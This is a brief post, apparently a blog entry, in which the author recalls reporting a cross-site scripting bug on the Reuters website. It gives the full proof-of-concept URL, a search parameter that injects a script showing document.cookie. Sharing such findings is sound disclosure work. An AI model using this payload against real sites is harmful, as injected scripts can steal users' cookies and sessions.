I've sent some time ago (more than 2 years? I cannot remember) an email regarding the xss on their (reuters) website. I've not tested other things as much as I can remember but there are a couple of other small bugs.
http://www.reuters.com/search?blob=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
Comments
Post a Comment